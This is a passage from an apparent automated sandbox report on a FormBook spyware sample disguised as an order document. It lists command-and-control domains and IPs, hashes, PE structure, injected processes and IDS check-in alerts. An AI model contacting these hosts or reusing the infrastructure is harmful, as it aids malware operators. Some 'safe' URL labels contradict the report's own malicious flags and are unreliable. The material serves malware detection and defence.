                                                                                    http://www.aihuzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.pngUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.ecosia.org/newtab/Utilman.exe, 00000007.00000003.2488878938.00000000083C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/header.fe363a40.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.gesichtspflege.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.lianyizhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.aihuzhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/pullup.jsUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://laduta.xyz/5mxq?T4OdNH=iO94RS5UfBQ5HCoDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000003CE6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.losbravos.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://tempuri.org/WarehouseDataDataSet.xsdYhttp://tempuri.org/WarehouseDataDataSet1.xsdEkursachForAORDER REF 47896798 PSMCO.exefalse
                                                                                        high
                                                                                        http://www.kanbzhibo.netfirefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.naturalelement.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.shareyourlove.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.reg.ru/dedicated/?utm_source=www.mosorehlable.online&utm_medium=parking&utm_campaign=s_lUtilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.salesa.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://companies.rbc.ru/Utilman.exe, 00000007.00000002.4563507919.00000000066B2000.00000004.10000000.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.00000000039C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.3xzhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.xiuchangzhibo.netUtilman.exe, 00000007.00000002.4563507919.0000000005BB4000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000007.00000002.4565292083.0000000008080000.00000004.00000800.00020000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000002.4561218750.0000000002EC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2594724012.0000000008414000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.londonatnight.coffee | United States | 16509 | AMAZON-02US | true
199.192.21.169 | www.solidf.xyz | United States | 22612 | NAMECHEAP-NETUS | true
47.83.1.90 | www.cruycq.info | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | true
192.64.119.109 | www.laduta.xyz | United States | 22612 | NAMECHEAP-NETUS | true
192.186.58.31 | www.aihuzhibo.net | United States | 132721 | PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL | true
199.59.243.228 | www.deadshoy.tech | United States | 395082 | BODIS-NJUS | true
194.58.112.174 | www.mosorehlable.online | Russian Federation | 197695 | AS-REGRU | true
104.21.53.168 | www.neoparty.sbs | United States | 13335 | CLOUDFLARENETUS | true
154.213.39.66 | www.f5jh81t3k1w8.sbs | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
103.247.11.204 | itcomp.store | Indonesia | 58487 | RUMAHWEB-AS-IDRumahwebIndonesiaCVID | true
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1585942
                                                                                          Start date and time:2025-01-08 14:58:09 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 33s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:11
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:2
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:ORDER REF 47896798 PSMCO.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@10/7@17/10
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 75%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 91%
                                                                                          • Number of executed functions: 94
                                                                                          • Number of non-executed functions: 287
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 4.245.163.56, 20.109.210.53
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
08:58:59 | API Interceptor | 1x Sleep call for process: ORDER REF 47896798 PSMCO.exe modified
08:59:01 | API Interceptor | 8x Sleep call for process: powershell.exe modified
08:59:55 | API Interceptor | 10853028x Sleep call for process: Utilman.exe modified
                                                                                          Process:C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1216
                                                                                          Entropy (8bit):5.34331486778365
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1172
                                                                                          Entropy (8bit):5.356731422178564
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:3CytZWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:yyjWSU4xympjms4RIoU99tK8NDv
                                                                                          MD5:68CB8F49FDE7FC3DF6CEE19CB730C7F8
                                                                                          SHA1:1EC425657E358C85CA4A3A04E6525E29B59FCB16
                                                                                          SHA-256:5DA91A846188B8604BEE0056451D6185AA1B91646196C90699ADFF530F8BC555
                                                                                          SHA-512:D3FB70289E5CD0287009394E3C9485467999DB61F9AB74D16C9E6D0CF7D0A2411BF0F165EF24D5E7BB71FCAF78A84F5499600074ED2A3FE4F8AE47CF09654415
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\SysWOW64\Utilman.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.1239949490932863
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.748224897787411
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          File name:ORDER REF 47896798 PSMCO.exe
                                                                                          File size:882'688 bytes
                                                                                          MD5:fa117772a94f43197a4632f47e78a56d
                                                                                          SHA1:717e83a352d1b81e9d5e3178f7d008c64a5e5efc
                                                                                          SHA256:51c1cf58f48a4cdad053a881d872925ec79a5a72f07d67a9b79bb13abaf636d3
                                                                                          SHA512:8e4f031addb61c2fb4746a23413c396360b4f6ff7030a389b1b7a028aad6881b5b8d40d25b2e6b01c86035385936177b5f88d02d38abf059d6712e413127513d
                                                                                          SSDEEP:12288:kbq4E6mfJiLl9bWcbQkpClSdyP19Xt0SEynFLmEsVS6V6nmpA/mkZR2kUb0gNHbv:2EkDppClbP2dyFLNoS6VpsR2kUhHbv
                                                                                          TLSH:8F1501483315DA05D4A24BB069B0F7F423759E8DA512D303AEE9BCFFBC3A3416D19296
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.}g..............0..V... ......^u... ........@.. ....................................`................................
                                                                                          Icon Hash:80acdadaaaa4c6ba
                                                                                          Entrypoint:0x4d755e
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x677DD731 [Wed Jan 8 01:38:57 2025 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd750c | 0x4f | .text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd8000 | 0x1d84 | .rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xda000 | 0xc | .reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                          .text | 0x2000 | 0xd5564 | 0xd5600 | 3427cbcd3525d89d167a38d57f8c39df | False | 0.9026847173403633 | data | 7.753164497880348 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc | 0xd8000 | 0x1d84 | 0x1e00 | c1d941e2a4b99ff451f922995842c18c | False | 0.85703125 | data | 7.394882686613583 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc | 0xda000 | 0xc | 0x200 | 51258e4941a73e8853b04983bb5d1cc2 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                                          RT_ICON | 0xd80c8 | 0x1967 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9407965554359526
                                                                                          RT_GROUP_ICON | 0xd9a40 | 0x14 | data | | | 1.05
                                                                                          RT_VERSION | 0xd9a64 | 0x31c | data | | | 0.43844221105527637
                                                                                          DLL | Import
                                                                                          mscoree.dll | _CorExeMain
                                                                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                          2025-01-08T14:59:34.664991+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49843 | 192.186.58.31 | 80 | TCP
                                                                                          2025-01-08T14:59:52.191623+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49955 | 154.213.39.66 | 80 | TCP
                                                                                          2025-01-08T14:59:54.737892+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49971 | 154.213.39.66 | 80 | TCP
                                                                                          2025-01-08T14:59:57.587982+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49979 | 154.213.39.66 | 80 | TCP
                                                                                          2025-01-08T15:00:00.156795+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49980 | 154.213.39.66 | 80 | TCP
                                                                                          2025-01-08T15:00:06.710081+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49981 | 47.83.1.90 | 80 | TCP
                                                                                          2025-01-08T15:00:09.257176+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49982 | 47.83.1.90 | 80 | TCP
                                                                                          2025-01-08T15:00:11.803811+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49983 | 47.83.1.90 | 80 | TCP
                                                                                          2025-01-08T15:00:14.452661+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49984 | 47.83.1.90 | 80 | TCP
                                                                                          2025-01-08T15:00:20.490072+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49985 | 104.21.53.168 | 80 | TCP
                                                                                          2025-01-08T15:00:23.116674+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49986 | 104.21.53.168 | 80 | TCP
                                                                                          2025-01-08T15:00:25.668710+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49987 | 104.21.53.168 | 80 | TCP
                                                                                          2025-01-08T15:00:28.199834+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49988 | 104.21.53.168 | 80 | TCP
                                                                                          2025-01-08T15:00:41.857618+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49989 | 199.59.243.228 | 80 | TCP
                                                                                          2025-01-08T15:00:44.388284+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49990 | 199.59.243.228 | 80 | TCP
                                                                                          2025-01-08T15:00:46.931953+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49991 | 199.59.243.228 | 80 | TCP
                                                                                          2025-01-08T15:00:49.482147+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.6 | 49992 | 199.59.243.228 | 80 | TCP
                                                                                          2025-01-08T15:01:03.479513+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49993 | 194.58.112.174 | 80 | TCP
                                                                                          2025-01-08T15:01:06.408818+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.6 | 49994 | 194.58.112.174 | 80 | TCP
                                                                                          2025-01-08T15:01:09.002599+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649995194.58.112.17480TCP
                                                                                          2025-01-08T15:01:11.571070+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649996194.58.112.17480TCP
                                                                                          2025-01-08T15:01:17.211294+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997199.192.21.16980TCP
                                                                                          2025-01-08T15:01:19.775685+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649998199.192.21.16980TCP
                                                                                          2025-01-08T15:01:23.191761+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649999199.192.21.16980TCP
                                                                                          2025-01-08T15:01:24.877969+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650000199.192.21.16980TCP
                                                                                          2025-01-08T15:01:30.427968+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650001192.64.119.10980TCP
                                                                                          2025-01-08T15:01:32.966574+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002192.64.119.10980TCP
                                                                                          2025-01-08T15:01:35.619610+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650003192.64.119.10980TCP
                                                                                          2025-01-08T15:01:38.065872+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650004192.64.119.10980TCP
                                                                                          2025-01-08T15:01:43.592669+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000513.248.169.4880TCP
                                                                                          2025-01-08T15:01:47.179389+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000613.248.169.4880TCP
                                                                                          2025-01-08T15:01:49.741610+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65000713.248.169.4880TCP
                                                                                          2025-01-08T15:01:52.254607+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65000813.248.169.4880TCP
                                                                                          2025-01-08T15:02:00.153796+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650009103.247.11.20480TCP
                                                                                          2025-01-08T15:02:02.760546+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010103.247.11.20480TCP
                                                                                          2025-01-08T15:02:05.517448+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011103.247.11.20480TCP
                                                                                          2025-01-08T15:02:08.109441+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650012103.247.11.20480TCP
                                                                                          2025-01-08T15:02:49.664886+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650013192.186.58.3180TCP
                                                                                          2025-01-08T15:02:56.720351+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650014154.213.39.6680TCP
